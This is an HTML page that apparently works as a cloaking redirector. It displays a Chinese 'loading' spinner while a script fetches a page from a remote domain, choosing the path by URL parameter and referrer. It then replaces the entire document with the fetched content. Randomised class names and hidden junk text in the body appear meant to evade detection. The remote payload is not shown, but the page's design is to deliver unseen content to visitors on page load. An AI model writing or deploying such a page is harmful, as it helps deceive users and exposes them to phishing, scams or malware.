<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ec7MFtPvC {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ec7MFtPvC .XYwr73KR7 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ec7MFtPvC .content {
            line-height: 50px;
            text-align: center
        }

        .Ec7MFtPvC .img {
            width: 100%
        }

        .Ec7MFtPvC .tH1qteNpHhA {
            text-align: center
        }

        .Ec7MFtPvC .tH1qteNpHhA span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ec7MFtPvC .tH1qteNpHhA span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ec7MFtPvC .tH1qteNpHhA span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ec7MFtPvC .tH1qteNpHhA span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ec7MFtPvC .tH1qteNpHhA span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ec7MFtPvC .tH1qteNpHhA span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ec7MFtPvC .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zOW8WFGpB7(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var AxxCW = zOW8WFGpB7('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ AxxCW +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ AxxCW +".html?a=share";
		}
		
        ayTTjBBwHE=url+"#"+new Date().getTime();
        ayTTjBBwHE && function() {
            $.get(ayTTjBBwHE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>WXKRADOKoTbBg1KE13LdkOWc0W306T04dLH6Aac2JKmUify00lwFVSiqEsF0qyMlNT6M</div>
<a  href='#' style='display:none'>vzb0prqJopR1niunAfHTQI8P9bFrWkv58wqTlK3RKmzAepjlxIzx</a>
<div style='display:none'>WXKRADOKoTbBg1KE13LdkOWc0W306T04dLH6Aac2JKmUify00lwFVSiqEsF0qyMlNT6M</div>
<img  src='' style='display:none'>
<h1 style='display:none' >gBziJdtKUbT3NVBQ98w5ssue9aSll9fcCVKz66pOVzYeSh4b8Zsvph6FyzpyKsHtgeOMqPgTq6xQang0CPe4WnVueSAJ7uPFSCmmP</h1><div class="Ec7MFtPvC">
    <div class="XYwr73KR7">
        <div class="tH1qteNpHhA">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>iv9xgheWALydZmTPlgEDIBzr89j2RFBXsCzZipxJVUFB0c3rshZtU4VXjJgwIi</span>
<b style='display:none' >vGgKwpFRqYc6JLxy4HTAFMom0R4tqmh7IoN5x</b>
<a  href='#' style='display:none'>NOzSL4Plpdk0mGmAQEfxSDBRsD2z9160NYCDBAulHWqY14rVkiMgTMf1YX2lMTRxQHGrDvqjE3u9AJzcqCtLHQIAVhr83GOmy</a></body>
</html>